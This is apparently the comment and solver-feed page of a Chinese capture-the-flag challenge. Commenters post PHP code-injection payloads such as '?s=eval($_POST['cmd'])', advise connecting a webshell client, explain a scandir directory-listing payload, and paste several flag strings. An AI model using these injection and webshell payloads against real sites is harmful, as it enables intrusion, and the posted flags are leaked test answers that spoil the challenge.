评分(9)
解题动态
szb123 攻破了该题 1小时前
17361232956 攻破了该题 2小时前
皮蛋瘦肉粥 攻破了该题 2小时前
aaa1 攻破了该题 3小时前
初入CTF联盟 攻破了该题 5小时前
hahahahahahaha 攻破了该题 6小时前
GEcharacter 攻破了该题 6小时前
wujiayi 攻破了该题 10小时前
huangfeiyu 攻破了该题 11小时前
晚霞难掩秋色 攻破了该题 11小时前
Julia 攻破了该题 21小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
评论
000ooo 9月前
举报
?s=eval+($_POST['123'])
ruien 10月前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 10月前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}
迷茫的三千面 10月前
举报
flag{f790b1679ece8cfe8ce3fc425c30896b}
星空 10月前
举报
?s=eval($_POST["cmd"]),再用蚁剑连
星空 10月前
举报
?s=eval($_POST["cmd"])
15824777912 11月前
举报
flag{11393cf7e26fe81d89dc60b63d3a1f52}
whitenul 11月前
举报
flag{9fd11e2660d3ad1f535e9f1de957424a}
InfoSec 11月前
举报
这里的?s=print_r(scandir('./'))是一个GET请求参数,通过GET方式传递给服务器。当服务器执行上述代码时,会调用PHP函数scandir()来列出当前目录下的所有文件和文件夹,并通过print_r()函数将这些目录内容打印输出到页面上。
17795946336 11月前
举报
flag{287b3bef4cb9712a82e858a1ad413de8}